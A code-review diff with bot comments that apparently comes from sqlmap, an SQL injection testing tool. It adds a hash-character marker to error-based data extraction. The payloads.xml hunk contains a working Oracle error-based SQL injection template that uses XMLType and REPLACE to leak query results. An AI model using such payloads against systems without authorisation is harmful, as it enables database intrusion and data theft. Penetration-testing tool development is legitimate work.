diff --git a/lib/core/agent.py b/lib/core/agent.py
index 07261b5fc..f45b8c500 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -217,7 +217,8 @@ class Agent:
_ = (
("[RANDNUM]", str(randInt)), ("[RANDNUM1]", str(randInt1)), ("[RANDSTR]", randStr),\
("[RANDSTR1]", randStr1), ("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\
- ("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar)
+ ("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar),\
+ ("[HASH_REPLACE]", kb.chars.hash_)
)
payload = reduce(lambda x, y: x.replace(y[0], y[1]), _, payload)
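Review bot: The added `,\` on the `[DOLLAR_REPLACE]` line continues a pattern that is not needed, because line breaks inside the parenthesised tuple are already implicit continuations and the trailing backslashes only add a way to break the file with stray whitespace after them. Since the list now grows with every new marker, I would put one pair per line with a trailing comma, e.g. `("[DOLLAR_REPLACE]", kb.chars.dollar),` then `("[HASH_REPLACE]", kb.chars.hash_),`. A short comment above the tuple saying that each `*_REPLACE` marker must have a matching reverse substitution in `__errorReplaceChars` would also help the next person who adds one. The enclosing method starts and ends outside this hunk.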
diff --git a/lib/core/option.py b/lib/core/option.py
index 7c5f3e570..91ba1ed80 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -1502,9 +1502,8 @@ def __setKnowledgeBaseAttributes(flushAll=True):
kb.chars.delimiter = randomStr(length=6, lowercase=True)
kb.chars.start = ":%s:" % randomStr(length=3, lowercase=True)
kb.chars.stop = ":%s:" % randomStr(length=3, lowercase=True)
- kb.chars.at = ":%s:" % randomStr(length=1, lowercase=True)
- kb.chars.space = ":%s:" % randomStr(length=1, lowercase=True)
- kb.chars.dollar = ":%s:" % randomStr(length=1, lowercase=True)
+
+ kb.chars.at, kb.chars.space, kb.chars.dollar, kb.chars.hash_ = (":%s:" % _ for _ in randomStr(length=4, lowercase=True))
if flushAll:
kb.headerPaths = {}
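Review bot: The four markers unpacked on the new line are not guaranteed to be distinct. Unless `randomStr` (not shown here) returns non-repeating characters, two of `kb.chars.at`, `kb.chars.space`, `kb.chars.dollar` and `kb.chars.hash_` can end up as the same `:x:` string, and the chained `replace` in `__errorReplaceChars` would then map both to whichever character it handles first. The removed per-marker calls had the same weakness, so this is a good place to close it by drawing distinct letters, for example `(":%s:" % _ for _ in random.sample(string.ascii_lowercase, 4))`, provided `random` and `string` are importable in this module. The unpacking also depends on `randomStr` returning exactly four characters, which deserves a one-line comment. `__setKnowledgeBaseAttributes` continues outside the hunk.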
diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py
index f4f923091..ab394b2ec 100644
--- a/lib/techniques/error/use.py
+++ b/lib/techniques/error/use.py
@@ -180,7 +180,7 @@ def __errorReplaceChars(value):
retVal = value
if value:
- retVal = retVal.replace(kb.chars.space, " ").replace(kb.chars.dollar, "$").replace(kb.chars.at, "@")
+ retVal = retVal.replace(kb.chars.space, " ").replace(kb.chars.dollar, "$").replace(kb.chars.at, "@").replace(kb.chars.hash_, "#")
return retVal
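Review bot: The chained `.replace(...)` on the new line repeats by hand the marker set that agent.py substitutes and payloads.xml nests, so a marker added in one place and missed here would pass through silently as literal `:x:` text in the returned value. I would drive it from a single sequence of pairs, e.g. `for marker, char in ((kb.chars.space, " "), (kb.chars.dollar, "$"), (kb.chars.at, "@"), (kb.chars.hash_, "#")): retVal = retVal.replace(marker, char)`. The function also has no docstring; one sentence stating that it reverses the `*_REPLACE` marker encoding applied to the retrieved value, and that the substitutions are applied in order, would be enough.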
diff --git a/xml/payloads.xml b/xml/payloads.xml
index 99d65321e..b51ff2373 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -1242,7 +1242,7 @@ Formats:
0
1
1
- AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
+ AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)